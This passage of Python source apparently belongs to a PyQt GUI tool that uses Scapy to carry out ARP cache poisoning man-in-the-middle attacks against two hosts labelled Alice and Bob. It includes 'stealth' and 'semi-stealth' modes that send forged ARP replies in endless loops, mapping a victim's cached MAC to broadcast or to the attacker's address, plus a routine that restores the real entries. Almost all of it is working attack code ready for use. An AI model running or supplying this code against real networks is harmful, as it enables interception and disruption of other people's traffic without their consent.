		pak_alice_as_brdcast_in_bob = Ether(dst=bob_mac,src=alice_mac)/ARP(op=0x0002,hwsrc=bCast_addr,psrc=alice_ip,hwdst=bob_mac,pdst=bob_ip)
		
		sendp(pak_bob_as_brdcast_in_alice, count=1)
		time.sleep(1)
		sendp(pak_alice_as_brdcast_in_bob, count=1)
		time.sleep(1)
		
    def launchSSMITM_BobExposed(self,alice_ip,alice_mac,bob_ip,bob_mac,my_ip,my_mac):
    	print "Poisoning via SSMITM [Exposed on Bob]..."
    	while True:
    		#the broadcast mac address:
		bCast_addr = 'ff:ff:ff:ff:ff:ff'

		#That is, setting Bob's MAC as broadcast in Alice
		pak_bob_as_brdcast_in_alice = Ether(dst=alice_mac,src=bob_mac)/ARP(op=0x0002,hwsrc=bCast_addr,psrc=bob_ip,hwdst=alice_mac,pdst=alice_ip)

		#Setting Alice's MAC as MINE in Bob
		pak_alice_as_mine_in_bob = Ether(dst=bob_mac,src=alice_mac)/ARP(op=0x0002,hwsrc=my_mac,psrc=alice_ip,hwdst=bob_mac,pdst=bob_ip)
		
		sendp(pak_bob_as_brdcast_in_alice, count=1)
		time.sleep(1)
		sendp(pak_alice_as_mine_in_bob, count=1)
		time.sleep(1)	
		
    def launchSSMITM_AliceExposed(self,alice_ip,alice_mac,bob_ip,bob_mac,my_ip,my_mac):
    	print "Poisoning via SSMITM [Exposed on Alice]..."
    	while True:
    		#the broadcast mac address:
		bCast_addr = 'ff:ff:ff:ff:ff:ff'

		#That is, setting Bob's MAC as MINE in Alice
		pak_bob_as_mine_in_alice = Ether(dst=alice_mac,src=bob_mac)/ARP(op=0x0002,hwsrc=my_mac,psrc=bob_ip,hwdst=alice_mac,pdst=alice_ip)

		#Setting Alice's MAC as Broadcast in Bob
		pak_alice_as_brdcast_in_bob = Ether(dst=bob_mac,src=alice_mac)/ARP(op=0x0002,hwsrc=bCast_addr,psrc=alice_ip,hwdst=bob_mac,pdst=bob_ip)
		
		sendp(pak_bob_as_mine_in_alice, count=1)
		time.sleep(1)
		sendp(pak_alice_as_brdcast_in_bob, count=1)
		time.sleep(1)

    def stopAttack(self):
    	if self.genericThread!=None:
    		self.genericThread.terminate()
    		self.genericThread = None
    		
    def undoAttack(self):
    	alice_ip_1 = self.lineEdit.text()
    	alice_ip_2 = self.lineEdit_2.text()
    	alice_ip_3 = self.lineEdit_3.text()
    	alice_ip_4 = self.lineEdit_4.text()
    	
    	alice_ip = str(alice_ip_1)+"."+str(alice_ip_2)+"."+str(alice_ip_3)+"."+str(alice_ip_4)
    	
    	alice_mac_1 = self.lineEdit_5.text()
    	alice_mac_2 = self.lineEdit_6.text()
    	alice_mac_3 = self.lineEdit_7.text()
    	alice_mac_4 = self.lineEdit_8.text()
    	alice_mac_5 = self.lineEdit_9.text()
    	alice_mac_6 = self.lineEdit_10.text()
    	
    	alice_mac = str(alice_mac_1)+":"+str(alice_mac_2)+":"+str(alice_mac_3)+":"+str(alice_mac_4)+":"+str(alice_mac_5)+":"+str(alice_mac_6)
    	
    	bob_ip_1 = self.lineEdit_16.text()
    	bob_ip_2 = self.lineEdit_19.text()
    	bob_ip_3 = self.lineEdit_12.text()
    	bob_ip_4 = self.lineEdit_20.text()
    	
    	bob_ip = str(bob_ip_1)+"."+str(bob_ip_2)+"."+str(bob_ip_3)+"."+str(bob_ip_4)
    	
    	bob_mac_1 = self.lineEdit_14.text()
    	bob_mac_2 = self.lineEdit_17.text()
    	bob_mac_3 = self.lineEdit_11.text()
    	bob_mac_4 = self.lineEdit_15.text()
    	bob_mac_5 = self.lineEdit_13.text()
    	bob_mac_6 = self.lineEdit_18.text()
    	
    	bob_mac = str(bob_mac_1)+":"+str(bob_mac_2)+":"+str(bob_mac_3)+":"+str(bob_mac_4)+":"+str(bob_mac_5)+":"+str(bob_mac_6)
    	
    	#First stop poisoning (If it isn't stopped)
    	if self.genericThread!=None:
    		self.genericThread.terminate()
    		self.genericThread = None
    	#Now, refresh MACs of Alice and Bob
    	
	#That is, setting Bob's MAC as Bob in Alice
	pak_bob_as_bob_in_alice = Ether(dst=alice_mac,src=bob_mac)/ARP(op=0x0002,hwsrc=bob_mac,psrc=bob_ip,hwdst=alice_mac,pdst=alice_ip)

	#Setting Alice's MAC as Alice in Bob
	pak_alice_as_alice_in_bob = Ether(dst=bob_mac,src=alice_mac)/ARP(op=0x0002,hwsrc=alice_mac,psrc=alice_ip,hwdst=bob_mac,pdst=bob_ip)
	
	print "Refreshing Alice's MAC\nSending 10 ARP Packets"
	sendp(pak_bob_as_bob_in_alice, count=10)
	print "Refreshing Bob's MAC\nSending 10 ARP Packets"
	sendp(pak_alice_as_alice_in_bob, count=10)
	#print "Bye"

    def launchAttack(self):
    	alice_ip_1 = self.lineEdit.text()
    	alice_ip_2 = self.lineEdit_2.text()
    	alice_ip_3 = self.lineEdit_3.text()
    	alice_ip_4 = self.lineEdit_4.text()
    	
    	alice_ip = str(alice_ip_1)+"."+str(alice_ip_2)+"."+str(alice_ip_3)+"."+str(alice_ip_4)
    	
    	alice_mac_1 = self.lineEdit_5.text()
    	alice_mac_2 = self.lineEdit_6.text()
    	alice_mac_3 = self.lineEdit_7.text()
    	alice_mac_4 = self.lineEdit_8.text()
    	alice_mac_5 = self.lineEdit_9.text()
    	alice_mac_6 = self.lineEdit_10.text()
    	
    	alice_mac = str(alice_mac_1)+":"+str(alice_mac_2)+":"+str(alice_mac_3)+":"+str(alice_mac_4)+":"+str(alice_mac_5)+":"+str(alice_mac_6)
    	
    	print "ALICE: "+alice_ip+" "+alice_mac
    	
    	bob_ip_1 = self.lineEdit_16.text()
    	bob_ip_2 = self.lineEdit_19.text()
    	bob_ip_3 = self.lineEdit_12.text()
    	bob_ip_4 = self.lineEdit_20.text()
    	
    	bob_ip = str(bob_ip_1)+"."+str(bob_ip_2)+"."+str(bob_ip_3)+"."+str(bob_ip_4)
    	
    	bob_mac_1 = self.lineEdit_14.text()
    	bob_mac_2 = self.lineEdit_17.text()
    	bob_mac_3 = self.lineEdit_11.text()
    	bob_mac_4 = self.lineEdit_15.text()
    	bob_mac_5 = self.lineEdit_13.text()
    	bob_mac_6 = self.lineEdit_18.text()
    	
    	bob_mac = str(bob_mac_1)+":"+str(bob_mac_2)+":"+str(bob_mac_3)+":"+str(bob_mac_4)+":"+str(bob_mac_5)+":"+str(bob_mac_6)
    	
    	print "BOB: "+bob_ip+" "+bob_mac
    	
    	my_ip_1 = self.lineEdit_25.text()
    	my_ip_2 = self.lineEdit_24.text()
    	my_ip_3 = self.lineEdit_27.text()
    	my_ip_4 = self.lineEdit_23.text()
    	
    	my_ip = str(my_ip_1)+"."+str(my_ip_2)+"."+str(my_ip_3)+"."+str(my_ip_4)
    	
    	my_mac_1 = self.lineEdit_28.text()
    	my_mac_2 = self.lineEdit_30.text()
    	my_mac_3 = self.lineEdit_26.text()
    	my_mac_4 = self.lineEdit_22.text()
    	my_mac_5 = self.lineEdit_21.text()
    	my_mac_6 = self.lineEdit_29.text()
    	
    	my_mac = str(my_mac_1)+":"+str(my_mac_2)+":"+str(my_mac_3)+":"+str(my_mac_4)+":"+str(my_mac_5)+":"+str(my_mac_6)
    	
    	print "MY: "+my_ip+" "+my_mac
    	
    	#Check if Stealth MITM
    	if self.radioButton.isChecked():
    		print "Stealth Attack"
    		if self.genericThread!=None:
    			self.genericThread.terminate()
    			self.genericThread = None
		self.genericThread = GenericThread(self.launchSMITM,alice_ip,alice_mac,bob_ip,bob_mac)
		self.genericThread.start()
    	elif self.radioButton_2.isChecked():
    		#Check if Stealth MITM Exposed to Bob
    		print "Semi Stealth Attack Exposed to Bob"
    		if self.genericThread!=None:
    			self.genericThread.terminate()
    			self.genericThread = None
    		self.genericThread = GenericThread(self.launchSSMITM_BobExposed,alice_ip,alice_mac,bob_ip,bob_mac,my_ip,my_mac)
    		self.genericThread.start()
    	else:
    		#Check if Stealth MITM Exposed to Alice
    		print "Semi Stealth Attack Exposed to Alice"
    		if self.genericThread!=None:
    			self.genericThread.terminate()
    			self.genericThread = None
    		self.genericThread = GenericThread(self.launchSSMITM_AliceExposed,alice_ip,alice_mac,bob_ip,bob_mac,my_ip,my_mac)
    		self.genericThread.start()
    	
    	
class GenericThread(QtCore.QThread):
    def __init__(self, function, *args, **kwargs):
    	QtCore.QThread.__init__(self)
    	self.function = function
    	self.args = args
    	self.kwargs = kwargs
    
    def __del__(self):
    	self.wait()
    	
    def run(self):
    	self.function(*self.args,**self.kwargs)
    	return
